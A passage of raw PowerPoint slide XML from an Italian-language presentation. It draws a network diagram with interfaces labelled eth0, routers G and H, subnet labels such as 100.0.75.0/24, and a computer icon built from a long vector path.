            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9294" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75D3D9B0-BBB9-01F8-5F23-F2633D727599}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9299" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A5FAB64-E8E4-61F4-9A5E-CBEBF39B15C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5725346" y="6015915"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9301" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C4FFE36-9875-A574-501A-D9ED6F0DBD10}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9306" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5178FA0-D8AE-E7C4-D753-F3ADA4356A90}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>10</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9307" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68E83DD0-9F73-C572-4BC2-7680D2A6EA54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6604255" y="2955119"/>
            <a:ext cx="220690" cy="220690"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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it-IT" altLang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9308" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B6C51CC-E6C0-7AA3-BDA5-0A52FF337D16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9716991" y="6049162"/>
            <a:ext cx="220690" cy="220690"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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it-IT" altLang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9315" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38B9DB37-FD77-C7D4-D84B-60C14E10D5C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6720678" y="2694193"/>
            <a:ext cx="2167360" cy="4596"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9316" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{106DEA10-E5B9-CE78-9BC8-119606A1AF33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6714600" y="2686926"/>
            <a:ext cx="0" cy="258512"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9317" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1328BD26-D02D-9175-E70E-08D3D7D5864E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8776956" y="2584226"/>
            <a:ext cx="1226618" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="5F5F5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it-IT" altLang="it-IT" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>100.0.75.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9318" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{298666BC-1EF5-2D4A-4409-B046FAB071F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="9937681" y="6139640"/>
            <a:ext cx="1146468" cy="16991"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9322" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42C60609-84ED-6F13-7322-5133E8506AC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10694421" y="6014104"/>
            <a:ext cx="1226618" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="5F5F5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it-IT" altLang="it-IT" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>130.100.00/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9323" name="Gruppo 9322">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C70701ED-0F7A-8F44-1E23-04EB6CD8A1B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7557227" y="3667061"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9324" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7292528-75CF-4E4E-5458-6E6AE14B7961}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4306849"/>
              <a:ext cx="378624" cy="350441"/>
            </a:xfrm>
            <a:prstGeom prst="cube">
              <a:avLst>
                <a:gd name="adj" fmla="val 15116"/>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endParaRPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9326" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2894500-B906-33FC-EE52-4210EEDA7A0B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4360763"/>
              <a:ext cx="324710" cy="296527"/>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 name="T24" fmla="*/ 326 w 21600"/>
                <a:gd name="T25" fmla="*/ 22180 h 21600"/>
                <a:gd name="T26" fmla="*/ 21559 w 21600"/>
                <a:gd name="T27" fmla="*/ 27893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extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="21600" y="10885"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10634" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10800" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="10885"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1163" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16449" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="2381"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2160" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1994" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1994" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
